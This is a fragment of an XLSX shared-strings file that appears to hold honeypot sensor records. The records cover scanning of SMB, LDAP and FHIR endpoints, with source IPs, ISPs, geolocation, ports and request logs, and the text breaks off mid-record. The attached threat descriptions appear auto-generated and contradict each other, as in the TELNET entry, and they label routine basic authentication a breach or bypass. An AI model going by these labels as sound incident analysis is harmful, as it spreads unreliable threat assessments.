  <si>
    <t>3161346</t>
  </si>
  <si>
    <t>59.8836</t>
  </si>
  <si>
    <t>11.564</t>
  </si>
  <si>
    <t>43568</t>
  </si>
  <si>
    <t>VEV Romerike AS</t>
  </si>
  <si>
    <t>RBB DSL</t>
  </si>
  <si>
    <t>2007-06-05</t>
  </si>
  <si>
    <t>2004-09-22 00:00:00</t>
  </si>
  <si>
    <t>2024-08-26 00:00:00</t>
  </si>
  <si>
    <t>::ffff:4df7:9220</t>
  </si>
  <si>
    <t>The log shows an attempt to connect to a TELNET service, which may be a scanning or probing activity by malicious actors, trying to exploit vulnerabilities in the system. This could be part of a larger reconnaissance effort. No TELNET connections were established however. &amp;&amp; No TELNET activity detected, but this could indicate an attacker attempting to access a service that is not enabled or is being monitored for potential malicious activity. This could be a probing attempt or a failed login attempt. It might also suggest that the system is secure and no one has tried to log in via TELNET.</t>
  </si>
  <si>
    <t>a4d00df30e95d19c1ee2b715294243f8</t>
  </si>
  <si>
    <t>121.200.53.174</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433</t>
  </si>
  <si>
    <t>Coimbatore</t>
  </si>
  <si>
    <t>Coimbatore (Balaji Nagar)</t>
  </si>
  <si>
    <t>1273865</t>
  </si>
  <si>
    <t>641018</t>
  </si>
  <si>
    <t>11.0223</t>
  </si>
  <si>
    <t>76.9797</t>
  </si>
  <si>
    <t>45284</t>
  </si>
  <si>
    <t>Wireline Solution India Pvt Ltd.</t>
  </si>
  <si>
    <t>WLSNET</t>
  </si>
  <si>
    <t>Wireless Solution India Pvt Ltd.</t>
  </si>
  <si>
    <t>2010-10-21</t>
  </si>
  <si>
    <t>WLSNET-IN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52052)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52089)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52556)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,54708)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55022)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,61568)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,61676)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,62053)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55927)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52380)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52404)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52810)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55749)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55754)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,56086)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,59454)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,59468)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,59785)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,62975)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,63016)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,63866)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,53649)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,53662)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55906)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55944)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,62715)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,62737)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,49761)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,49767)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:79c8:35ae</t>
  </si>
  <si>
    <t>A suspicious incoming SMB connection attempt from IP address 121.200.53.174, possibly indicating a brute-force or unauthorized access attempt to shared files or resources on the monitored system. This could be an initial step in a larger malicious activity, such as data exfiltration or ransomware deployment. &amp;&amp; An incoming SMB connection from a suspicious IP address 121.200.53.174 to an unknown port 49767 suggests a potential malicious attempt to access and exploit vulnerabilities on the monitored system.
This could be a reconnaissance phase of a larger attack or an attempt to spread malware through shared resources.
The unusual port may indicate an attempt to bypass usual security controls. &amp;&amp; A user has authenticated to a service using basic credentials, potentially indicating unauthorized access to internal resources. This could be an attempted or successful intrusion by an attacker trying to gain elevated privileges. The use of basic authentication suggests the attacker may have been unable to authenticate using more secure methods. &amp;&amp; Malicious user has accessed a shared resource on the network, likely for unauthorized access or data exfiltration. The use of basic authentication suggests an attempt to exploit weak security measures. Authentication was successful, indicating potential exploitation of vulnerabilities or stolen credentials. &amp;&amp; Unauthorized user has been granted access to share using basic authentication credentials, potentially enabling malicious activity within the network. This could be a sign of an attacker attempting to escalate privileges or gain unauthorized access. Further monitoring is necessary to determine extent of breach. &amp;&amp; An attacker has attempted to authenticate using basic authentication on a shared network service, indicating possible brute force or unauthorized access attempts. This may be a precursor to further malicious activity such as file exfiltration or system compromise. The user account was able to bypass initial security checks.</t>
  </si>
  <si>
    <t>SMB Attack &amp;&amp; SMB Portscan &amp;&amp; SMB Breach &amp;&amp; SMB Auth Bypass &amp;&amp; SMB Auth &amp;&amp; SMB Auth</t>
  </si>
  <si>
    <t>8251391ec07de8aa6253b5b81d175f4e</t>
  </si>
  <si>
    <t>120.60.108.104</t>
  </si>
  <si>
    <t>::ffff:783c:6c68</t>
  </si>
  <si>
    <t>227bd562dcd21c391787cd2e9c279ff6</t>
  </si>
  <si>
    <t>193.174.89.19</t>
  </si>
  <si>
    <t>fb02itsscan02.fh-muenster.de&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_NTP_H4&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_SSH_H2&amp;&amp;SMA-LAB_HTTP_H15&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_DNS_H31&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_LDAP_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;123&amp;&amp;5900&amp;&amp;22&amp;&amp;80&amp;&amp;9100&amp;&amp;1080&amp;&amp;445&amp;&amp;53&amp;&amp;30238&amp;&amp;52781&amp;&amp;52780&amp;&amp;43460&amp;&amp;NA&amp;&amp;56168&amp;&amp;443</t>
  </si>
  <si>
    <t>NW</t>
  </si>
  <si>
    <t>North Rhine-Westphalia</t>
  </si>
  <si>
    <t>Düsseldorf District</t>
  </si>
  <si>
    <t>Duisburg</t>
  </si>
  <si>
    <t>2934691</t>
  </si>
  <si>
    <t>47051</t>
  </si>
  <si>
    <t>51.4344</t>
  </si>
  <si>
    <t>6.76233</t>
  </si>
  <si>
    <t>680</t>
  </si>
  <si>
    <t>Verein zur Foerderung eines Deutschen Forschungsnetzes e.V.</t>
  </si>
  <si>
    <t>Fachhochschule Muenster</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '185.74.222.213', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '109.123.229.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.224.106', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '194.4.48.242', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.60.171.39', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '66.94.127.183', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '149.102.153.168', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '94.131.113.33', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '144.126.148.5', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/fhir-server/api/v4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR5/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseR3/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/r4/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': '38.54.117.64', 'User-Agent': 'FH Muenster/Security-Scanner/fh-muenster.de', 'method': 'GET', 'uri': '/baseDstu2/metadata'}}&amp;&amp;{Data_HTTP:{'Accept': 'application/fhir+json', 'Connection': 'keep-alive', 'Content-Type': 'application/fhir+json', 'Host': 